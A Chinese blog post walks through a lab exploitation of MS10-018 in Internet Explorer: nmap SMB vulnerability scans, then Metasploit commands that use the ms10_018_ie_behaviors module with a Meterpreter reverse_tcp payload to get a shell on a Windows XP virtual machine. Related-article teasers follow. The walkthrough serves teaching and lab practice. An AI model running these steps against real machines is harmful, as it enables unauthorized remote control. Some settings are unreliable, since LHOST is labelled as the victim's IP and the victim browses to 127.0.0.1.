渗透测试(MS10-018漏洞利用)

最新推荐文章于 2024-07-31 17:32:19 发布
最新推荐文章于 2024-07-31 17:32:19 发布
阅读量2.1k 收藏 15
点赞数 2
分类专栏: 网络安全 文章标签: 安全 kali linux metasploit 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45740212/article/details/113242034
版权

渗透测试

测试平台

使用平台:Kali(虚拟机)
使用工具:Metasploit
渗透目标:windows xp(虚拟机)
渗透目的:获得目标节点shell

测试步骤

1.前期准备(网络配置)

Kali 和 Windows XP 均使用 Host-Only仅主机 连接方式。
网络配置xp使用ipconfig,Kali使用ifconfig,获得并记录下对应IP(图略)【也可用Kali nmap 进行扫描】

同时,需关闭XP防火墙。
关闭防火墙注意:做完这些操作后需用ping测试两机互通性

2.查找漏洞是否可用

首先使用Nmap进行扫描,查看目标主机是否含有我们想要利用的漏洞,
可以使用的命令:

全部扫描:
nmap -P0 --script=smb-vuln-conficker 【IP】
nmap -P0 --script=smb-vuln-* 【IP】
具体扫描:
smb-vuln-ms10-018

进入MSF,查看MS10-018漏洞是否可用。
命令:

sudo msfconsole    进入MSF
search ms10_018    查找漏洞

查找漏洞

3.利用漏洞进行监听

Kali开启监听
命令:

use exploit/windows/browser/ms10_018_ie_behaviors 
set payload windows/meterpreter/reverse_tcp
set SRVPORT 80
set URIPATH /
set LHOST 192.168.42.131     XP的IP
set LPORT 880
exploit

Kali开启监听

4.利用漏洞

在XP中打开浏览器,输入http://127.0.0.1/【图略】

至此,漏洞利用成功,获得XP shell,可以进行其余一系列操作。
利用成功

总结

本文仅简单介绍了使用MSF进行简单的漏洞利用方法,作分享使用。
值得注意的是:为了漏洞利用成功,可尽量选择低版本的XP系统,保证漏洞存在。
有任何问题都可以在评论区和我交流~~

AspirinK
关注
专栏目录
安全渗透测试笔记-----安全漏洞生命周期
WEL测试
09-12 4438
1.6 漏洞分析与利用          在渗透测试流程中,核心内容是找出目标系统存在的安全漏洞,并实施渗透攻击,从而进入到目标系统中。而这一过程最主要的底层基础是目标系统中存在的安全漏洞(Vulnerability)。 1.6.1 安全漏洞生命周期          安全漏洞指信息系统中存在的缺陷或不适当的配置,它们可使攻击者在未授权情况下访问或破坏系统,导致信息系统面临安全风险。利用安全
渗透之漏洞利用
薛定谔的博客
06-09 4544
1.使用Medusa获得远程服务的访问权限Medusa被称为通过并行登录暴力破解的方式尝试获取远程验证服务访问权限的工具。想要使用Medusa需要事先获取一些信息,包括目标IP地址,用于登录的某个用户名或一个用户列表,在登录时使用的某个密码或包含众多密码的字典文件。2.Metasploit在介绍Metasploit之前,先对比一下Metasploit漏洞扫描之间的区别。大多数情况下,我们利用漏洞...
渗透测试漏洞利用
qq_29864185的博客
07-01 809
漏洞利用 当我们探测到了该网站存在漏洞之后,我们就要对该漏洞进行利用了。不同的漏洞有不同的利用工具,很多时候,通过一个漏洞我们很难拿到网站的webshell,我们往往需要结合几个漏洞来拿webshell。常用的漏洞利用工具如下: SQL注入 ,传送门——>Sqlmap的使用 XSS跨站脚本,传送门——>Beef-XSS的使用 抓包改包工具,——>Burpsuite工具的使用 、Fidder抓包软件的使用 文件上传漏洞,上传漏洞的话,我们一般会上传一句话木马上去,进...
Kali Linux渗透测试,这篇就够了!
最新发布
fly_enum的博客
07-31 603
​web渗透测试旨在通过查找目标网站由于技术原因所造成的漏洞,而导致网站使他人攻击。测试的本质是找出漏洞并提交他人修复。本文可能存在各种攻击手段和攻击方法
渗透测试漏洞利用
weixin_33869377的博客
07-23 1350
1、概念 : 漏洞利用exploitation获得系统额控制权限,我们只考虑获取管理员权限。漏洞利用就是执行一次漏洞攻击的过程,而漏洞攻击程序是利用漏洞(vulnerability)实施攻击的一种具体体现。 在这之前我说一下,kali linux 中截图工具的使用方法,没有必要下载截图工具,因为kali linux中有截图快捷键,在设置中找到键盘,截图额快捷根据自己习惯可以自己设...
渗透测试漏洞利用开启篇
Jeanphorn的专栏
06-09 8928
1. 漏洞利用目的   简单的了解网络中已知的漏洞,对网络和系统的综合安全控制是不够的。进行针对性的,全面的漏洞测试是有很多好处的。    跳出安全工作的猜测和怀疑。   通过提供关键基础设备的入侵而导致敏感数据泄露或更改,使安全问题引起重视,管理团队也可以获得实施补救措施的必要细节。 验证防护措施的安全性。   漏洞利用渗透测试可以验证理论上防御控制的安全性,是管理者能够证明采取的
使用Nmap漏扫+Metasploit渗透测试框架,利用MS08-067漏洞渗透
george1898的博客
12-25 1164
本期框架介绍:Metasploit是一一款开源的安全漏洞检测工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全评估,提供真正的安全风险情报。当用户第一次接触Metasploit渗透测试框架软件(MSF)时,可能会被它提供如此多的接口中、选项、变量和模块所震撼,而感觉无所适从。下面我们将应用一个安全来熟透认知、一起来探讨它的微妙吧!
渗透攻击之ms14-064漏洞利用实验
wylululu的博客
01-07 8178
ms14-064简介 Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 –Win10+IE11全版本。 实验步骤: 第一步:打开已安装好的kaili虚拟机系统,显示界面: 第二步:单击打开metasploit framework或者点击左上角应用程序&...
渗透攻击漏洞利用实验(ms08-067、samba漏洞利用,ms03-026漏洞利用并长期保持)
qq_20381661的专栏
04-10 4816
(一)对MS08_067漏洞渗透攻击 1.使用msfconsole启动Metasploit终端,进入后使用search命令,搜索该漏洞对应的模块: 2.启用这个攻击模块,查看信息,设置攻击载荷: 3.查看渗透攻击所需的配置选项: 4.根据具体情况配置渗透攻击各个选项,并查看设置后的情况: 5.使用exploit发起渗透攻击,获得shell并进行简单操作: (二)利用samba漏洞 1.使用seach命令搜索samba漏洞对应的模块: 2.启用usermap_s
Windows网络服务渗透测试实战`MS17-010漏洞复现的学习
GUN_C的博客
11-14 1043
永恒之蓝,渗透基础
渗透测试和复现ms17-010漏洞攻击
Yb528970805的博客
09-15 451
ms17_010 是一种操作系统漏洞,仅影响 Windows系统中的 SMBv1 服务。这个漏洞是由于SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。
渗透测试--2.漏洞探测和利用
我是个好人呀,????
05-14 3563
网络漏洞系统漏洞应用漏洞
渗透测试突破口之常见打点及漏洞利用
hackzkaq的博客
09-01 6056
JWT攻击手法 未校验签禁用哈希爆破弱密钥 注入 注入无列名 结合dnslog 拿shell 连接 XSS克隆钓鱼 伪造页面钓鱼 CSRF php任意文件读取/下载 php文件包含 函数: 常用协议 Getshell allow_url_include 开启时Getshell allow_url_include 关闭时Getshell 包含日志文件getshell 上传个图片格式的木马直接包含 限制后缀时 phpinfo-LFI 本地文件包含临时文件gets...
渗透测试-逻辑漏洞出现场景、利用方式总结
lza20001103的博客
08-23 690
逻辑漏洞出现场景、利用方式总结 文章目录逻辑漏洞出现场景、利用方式总结一、前台模块二、密码找回模块三、登录模块四、业务逻辑层模块五、案例分享1、逻辑支付六、漏洞思考组合拳1、Self-xss+Csrf组合拳2、逻辑漏洞组合拳3、设计缺陷组合拳4、第三方登录此外总结了一些思路一 、针对业务处二、漏洞处验证码问题短信轰炸水平越权数据泄露三、支付逻辑漏洞 一、前台模块 1、短信轰炸 参数修改短信轰炸,可以直接修改手机号或者其他参数 Cookie短信轰炸 根据业务的判断 2、手机号遍历枚举 绕过风控继续遍历 简单遍
MS10-018漏洞利用
m0_43406494的博客
11-12 864
本次实验中,靶机xp系统的ip地址为192.168.94.132,攻击者kali系统的ip为192.168.94.135 搜索MS10-018相关的漏洞利用payload,并选择其中一个 配置好选项后进行攻击,kali中开启了8080端口作为服务器 在xp系统靶机中,打开IE浏览器访问 http://192.168.94.135:8080/n9dakZWR7ARJewO 如下可见利用成功,并开启了一个新session ...
微软ms10_018漏洞的利用
qq_50854662的博客
05-26 2841
微软ms10_018漏洞的利用 0x00 前言0x01 study1. 漏洞利用环境1.1 目标机环境1.2 攻击机环境1.3 拓扑结构 2. ping测试3. exploit3.1 启动Metasploit3.2 查找和MS10-018相关的模块3.3 加载模块3.4 设置PAYLOAD3.5 显示需要配置的选项3.6 设置Web服务器的地址,应为BackTrack虚拟机的地址3.7 目标主机被控制后反弹的地址,应为BackTrack虚拟机的地址3.8 显示需要设置的浏览器类型3.9 设置攻击目.
Metasploits之ms10_018
weixin_30741653的博客
07-26 300
漏洞详情:https://technet.microsoft.com/library/security/ms10-018 一准备:   1:kali Linux系统  192.168.195.129   2:Windows XP系统  192.168.195.130 二:Kali Linux系统操作 1::msfconsole  启动metsploits 2:s...
ms10_018_ie_behaviors漏洞复现
m0_48907714的博客
03-11 5814
ms10_018漏洞复现 漏洞介绍:ms10_018漏洞,它是IE浏览器漏洞,可以通过该漏洞获取目标主机的控制权。 00x01实验环境 两台虚拟机,一台为kali ip:192.168.72.4 一台为 Windows xp ip:192.168.72.6 使用的工具:msfconsole 00x02实验过程 打开两台虚拟机,打开kali的msf软件,搜索ms10_018漏洞,找到两个模块 use第一个模块exploit/windows/browser/ms10_018_ie_behaviors
给你一个网站你是如何来渗透测试的?——漏洞利用
weixin_45200712的博客
10-12 2576
漏洞利用方法工具MSFMSF基本概念技术架构基本命令情报收集口令猜测社会工程学网络服务器渗透攻击meterpreter提取Sqlmap sql注入神器参数sqlmap,怎么对一个注入点注入? 方法工具 MSF MSF基本概念 一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。 渗透攻击是MSF最强大和最具吸引力的核心功能,还有情报搜集(集成数据库)、威胁建模(找出最可行的攻击路径)、漏洞分析、后渗透攻击与报告生成 技术架构 一个模块就是一个rb脚本 explo
Metasploit渗透测试教程:利用MS12-004漏洞
Metasploit是一款广泛应用于安全评估和渗透测试的开源框架,它包含了大量的漏洞利用模块、扫描器、后渗透工具等,可以帮助安全专家模拟攻击行为,发现系统中的安全漏洞。在本教程中,作者使用了Metasploit来演示MS12...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值